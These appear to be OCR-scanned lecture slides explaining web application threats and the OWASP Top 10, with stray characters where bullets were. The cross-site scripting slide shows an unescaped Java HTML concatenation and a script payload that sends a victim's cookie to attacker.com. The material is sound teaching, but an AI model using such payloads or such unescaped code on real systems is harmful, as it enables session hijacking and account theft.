Web Based Application 
Risks and Threats 


Objectives 


e Discuss web based application threats and risks 
e Explain the OWASP Top 10 


OWASP Top 10 


e OWASP - Open Web Application Security Project 
e Started in 2001 and officially 2004 
e Designed to education about secure software 
e Top 10 
e Represents the top 10 most critical risks to web applications 
e Released every few years to help developers and the 
community pay attention to risks 
e Latest Top 10 
e 2013 
e 2017 - to be released in July or August of 2017 


Al - Injection 


e Injection flaws have been at the top of the list for years 


e Covers: 
e SQL 
e Command 
e XXE 
e LDAP 


e Attacker sends untrusted data to a system that 
interprets the data 


e Attacker can do almost anything depending on what 
software is running for the interpreter. 


A2 - Broken Authentication and 
Session Management 


e User sessions can be hijacked 


e İnformation that can be stolen or accessed 
e Session ID 
e Usernames 
e Passwords 
e Account information 
e Cookies 


e Poor authentication coding methods allow attackers to 
gain access 


A3 - Cross-Site Scripting 


e Very wide spread issue 

e Can be either executed on the server or client 
e Can also be stored or reflected attacks 

e Attackers execute scripts via a browser 


e The application uses untrusted data in the construction of the following 
HTML snippet without validation or escaping: 
e (String) page += "<input name='creditcard' type='TEXT' value="" + 
request.getParameter("CC") + ">"; 
e The attacker modifies the ‘CC’ parameter in his browser to: 
e '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgl? 
foo='+document.cookie</script>". 
e This attack causes the victim’s session ID to be sent to the attacker’s 
website, allowing the attacker to hijack the user’s current session. 


A4 - Broken Access Control 


e Attackers use insufficient security measures to bypass 
authentication mechanisms 


e Example: 
http://example.com/app/accountinfo?acct=notmyacct 
e Change in parameter values allow access 


A5 - Security Misconfiguration 


e See the misconfiguration video 


A6 - Sensitive Data Exposure 


e Really this is just data exposure 
e Can happen a number of different ways 


e Most breaches occur because someone did not encrypt 
the data properly 


e Can be used in conjunction with other methods 


A7 - A10 


e Dives into protection 
e A7 - Insufficient Attack Protection 


e A8 - Cross-Site Request Forgery - while this isn’t 
protection, it acts the same way as XSS 


°. A9 - Using Components with Known Vulnerabilities 
e A10 - Underprotected APIs 


